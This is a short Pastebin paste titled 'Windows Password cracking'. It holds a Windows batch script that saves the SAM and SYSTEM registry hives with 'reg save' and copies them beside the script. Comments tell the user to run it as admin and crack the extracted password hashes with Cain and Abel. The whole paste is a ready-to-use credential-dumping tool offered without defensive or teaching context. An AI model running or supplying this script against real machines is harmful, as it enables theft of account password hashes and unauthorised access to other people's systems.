mdestroy

Windows Password cracking

Sep 6th, 2016
846
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.33 KB | None | 0 0
  1. #offline windows password cracking
  2. #save this file as batch file, then execute it as admin
  3. #you'll get sam and system files on the current directory
  4. #The hashes can be cracked through Cain and Abel
  5.  
  6. @echo off
  7. reg save hklm\sam C:\sam
  8. reg save hklm\system C:\system
  9. copy "C:\sam" "%~dp0"
  10. copy "C:\system" "%~dp0"
  11. pause
  12. exit
Add Comment
Please, Sign In to add comment